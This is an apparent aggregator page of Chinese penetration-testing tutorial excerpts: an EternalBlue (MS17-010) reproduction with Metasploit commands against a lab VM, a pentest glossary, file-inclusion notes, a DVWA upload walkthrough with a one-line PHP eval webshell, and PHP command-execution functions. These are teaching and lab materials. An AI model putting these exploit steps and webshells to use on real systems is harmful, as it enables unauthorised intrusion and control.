漏洞

【漏洞复现】永恒之蓝漏洞(MS17-010)

自闭症网瘾萝莉.ら 提交于 2020-02-05 07:39:27
一、MS17-010 Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 目前已知受影响的Windows 版本包括但不限于: WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0 二、准备 攻击机:kali-2019 192.168.75.134 靶机:win7_x86(关闭防火墙) 192.168.75.130 三、渗透测试 1、用 nmap 扫描本网段中存活的主机 nmap -r 192.168.75.0/24 ,可以看到探测到了靶机,445端口开放,永恒之蓝利用的就是445端口的 SMB 服务(注意把防火墙关闭,否则ping不通)。 2、进入 MSF 框架,输入命令 msfconsole 搜索 ms17-010 的 exploit,输入 search ms17-010 ,Name栏应该显示对应 payload 的名称。 3、使用 ms17-010

Matesploit-msf的使用

梦想与她 提交于 2020-02-05 05:48:37
一 Matesploit的介绍 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 二 MSF的基本模块 三 msf漏洞利用流程 扫描靶机 [use auxiliary/scanner/smb/smb_ms17_010] [set rhosts 192.1683.139.140]—设置要扫描的主机ip地址 [exploit]—开始攻击 选择exploit [use exploit/windows/smb/ms17_010_eternalblue]—使用攻击模块 [show options]----查看需要设置的参数 [set rhosts 192.168.139.140]—设置被攻击主机ip地址 [set lhosts 192.168.139.153]—设置攻击主机ip地址 [set threads 512]—设置攻击主机ip地址

详细渗透测试专业术语介绍

蓝咒 提交于 2020-02-04 15:02:23
1. 脚本 :(asp、php、jsp……等) 2. MD5 :不可逆加密 3. HTTP协议 :HTTP协议定义Web客户端如何从Web服务器请求Web页面,以及服务器如何把Web页面传送给客户端 4. CMS :内容管理系统(已经写好的管理系统 稍微修改一下就可以直接使用) 5. 框架 :代码框架 比如cms是已经装修好的房子 框架就是毛坯房 6. 肉鸡 :被黑客入侵并被长期驻扎的计算机或服务器 7. 抓鸡 :利用使用量大的程序的漏洞,使用自动化方式获取肉鸡的行为 8. WebShell :通过Web入侵后留下的后门工具,可以据此对网站服务进行一定程度的控制 9. 漏洞 :硬件、软件、协议等等的可利用安全缺陷,可能被攻击者利用,对数据进行篡改,控制等 10. 一句话【木马】 :通过向服务端提交一句简短的代码,配合本地客户端实现webshell功能的木马 11. 提权 :操作系统低权限的账户将自己提升为管理员权限使用的方法 12. 后门 :黑客为了对主机进行长期的控制,在机器上终止的一段程序或留下的一个“入口” 13. 跳板 :使用肉鸡IP来实施攻击其他目标,以便更好的隐藏自己的身份信息 14. 旁站入侵 :即同服务器下的网站入侵,入侵之后可以通过提权跨目录等手段拿到目标网站的权限。常见的旁站查询工具有:WebRobot、御剑、和web在线查询等 15. C段入侵

web渗透【10】文件包含漏洞

点点圈 提交于 2020-02-04 10:52:20
目录 一、文件包含简介 二、本地文件包含漏洞 三、session文件包含漏洞 有限制本地文件包含漏洞绕过 无限制本地文件包含漏洞绕过 四、远程文件包含漏洞 无限制远程文件包含漏洞 有限制远程文件包含漏洞绕过 问号绕过 #号绕过 空格也可以绕过 五、PHP伪协议 php:// 输入输出流 php://filter(本地磁盘文件进行读取) php://input php://input (读取POST数据) php://input(命令执行) file://伪协议 (读取文件内容) data://伪协议 data://(读取文件) phar://伪协议 zip://伪协议 一、文件包含简介 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件 文件包含函数--- PHP中文件包含函数有以下四种: require() require_once() include() include_once() include 和 require 区别主要是, include 在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行;而 require 函数出现错误的时候

一步一步学习DVWA渗透测试-(File Inclusion文件包含)-第八次课

五迷三道 提交于 2020-02-03 17:52:59
File Inclusion ,意思是文件包含(漏洞),是指当服务器开启llow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。 文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。 如果打开File Inclusion,出现下面的信息,这需要修改配置文件 找到php.ini中的allow_url_include,如果原来为off,设置为On。 重新启动服务,再次打开,显示如下,则为正常状态。 1、Low 低级别 查看源代码 可以看到没有对页面提交的文件做任何过滤检查,url为http://192.168.92.129/DVWA/vulnerabilities/fi/?page=file1.php 服务器期望用户的操作是点击下面的三个链接,服务器会包含相应的文件,并将结果返回。需要特别说明的是,服务器包含文件时,不管文件后缀是否是php,都会尝试当做php文件执行,如果文件内容确为php,则会正常执行并返回结果,如果不是,则会原封不动地打印文件内容

文件上传漏洞详解

淺唱寂寞╮ 提交于 2020-02-03 06:56:25
网站图片、文件上传功能漏洞笔记 文件上传漏洞之程序员未对上传的文件进行严格的上传和过滤,导致用户可以利用上传功能向服务器上传木马、病毒、恶意脚本、webshell等。“文件上传”本身没有问题,有问题是文件上传后服务器的处理和解析逻辑。 制作脚本文件上传至web服务器   制作脚本文件(制作相关语言文件)   php:   <?php @ eval ( $_POST ['pass']);?>   aspx:   <%@ Page Language= " Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>   asp:    <%eval request ( " pass")%>   制作图片木马   利用Edjpgcom软件直接将语句插入,或者利用cmd命令将脚本文件和图片相结合   Edjpgcomr图片插入语句 <?fputs(fopen( " shell.php","w"),<?php @eval($_POST['pass']);?>)?>   利用文件包含解析漏洞让服务器对图片进行解析,在服务器端生成脚本文件。 利用“中国菜刀”软件进行连接脚本文件   软件中的配置框中可以进行数据库配置连接      脚本绕过防火墙   具体是后端上传文件过滤语句不完善导致,文件后缀过滤、大小过滤、文件类型过滤、文件内容过滤等。   例如

基本漏洞层次记录笔记

人走茶凉 提交于 2020-02-03 05:07:12
静态层 Html javascript jQuery XSS 漏洞 、 Self XSS 脚本层 ASP ASPX PHP JSP 文件包含 、 代码执行、文件上传、…… 数据层 MySQL Oracle SQL server Redis mongodb 溢出漏洞、版本过低、未授权访问 服务层 IIS NGINX Apache 不安全的HTTP方法(PUT 上传文件/DELETE 删除文件)、文件解析漏洞、版本过低 系统层 WINDOWS LINUX 远程代码执行、本地特权提升、拒绝服务 来源: CSDN 作者: 爱吃鱼L 链接: https://blog.csdn.net/qq_40980391/article/details/104090976

DVWA靶机--简单的文件上传漏洞

依然范特西╮ 提交于 2020-02-02 13:33:53
简单的文件上传漏洞(靶机安全级别:low) 事先准备好一句话木马,密码为pass 上传一句话木马,显示上传路径(一般网站是不会显示路径的,这里靶机为了方便你测试漏洞,直接显示出了路径: ../../hackable/uploads/pass.php succesfully uploaded!) 我们先尝试打开看看,将路径拼接到url后面:http://192.168.147.137/dvwa/hackable/uploads/pass.php 访问成功,但是没有显示任何东西(因为是php文件) 打开 中国蚁剑 连接工具(或者 中国菜刀 )将url添加进去,密码为pass 打开文件管理,进入后台成功 来源: https://www.cnblogs.com/echoDetected/p/12251716.html

PHP命令执行漏洞基础

浪尽此生 提交于 2020-02-02 05:46:03
前言 PHP命令执行漏洞 应用程序的某些功能功能需要调用可以执行系统命令的函数,如果这些函数或者函数的参数被用户控制,就有可能通过命令连接符将恶意命令拼接到正常的函数中,从而随意执行系统命令,这就是命令执行漏洞。 基本函数 1.system()用于执行外部程序,并且显示输出 <?php system('whoami'); ?> 2.exec()函数用于执行一个外部程序 <?php exec('whoami');?> 3.shell_exec()函数通过shell环境执行命令,并且将完整的输出以字符串的方式返回 <?php shell_exec('whoami'); ?> 4.passthru函数用于执行外部程序并且显示原始输出 <?php passthru('whoami'); ?> 5.popen()函数用于打开进程文件指针 r: 只读。 w: 只写 (打开并清空已有文件或创建一个新文件) <?php touch popen("3.txt","r"); ?> 在当前目录创建名为3.txt的文件 6.Proc_popen函数用于执行一个命令,并且打开来输入输出的文件指针(有问题) proc_open (字符串 $cmd ,数组 $descriptorspec ,数组 &$pipes [,字符串 $cwd = NULL [,数组 $env = NULL [,数组 $other

PHP-Audit-Labs第一阶段学习总结

天大地大妈咪最大 提交于 2020-02-01 19:01:41
目录 DAY 1 DAY 2 DAY 3 DAY 4 DAY 5 DAY 6 DAY 7 DAY 8 DAY 9 DAY 10 DAY 11 DAY 12 DAY 13 DAY 14 DAY 15 DAY 16 DAY 17 总结 由于篇幅原因,源码详见 GITHUB源码链接 。同时在这感谢红日安全的分享。因为笔者还是个菜鸡,所以有些地方难免有些错误,请各大佬斧正。同时本篇总结以代码审计为主,部分可能会弱化具体的攻击方法 DAY 1 程序本质 文件上传 漏洞本质 函数缺陷导致的任意文件上传漏洞 缺陷函数 in_array函数 攻击类型 绕过检验 众所周知,php是弱类型语言,当未将in_array函数第三个参数设置为true时,默认进行宽松比较。所以函数在执行搜索项时,会将搜索值强制转换成数字类型。漏洞即在此产生。 攻击: 当我们创建一个文件名首数字为1-24之间的文件。即可通过in_array函数判断,导致任意文件上传漏洞。例:7shell.php DAY 2 程序本质 用twig模板的点击获得传入链接程序 漏洞本质 函数缺陷导致的xss漏洞 缺陷函数 filter_var函数 攻击类型 绕过检验 程序采取了两种过滤: Twig模板中的escape过滤。关于过滤详见: Twig中文文档 这里面有一句话:Internally, escape uses the PHP native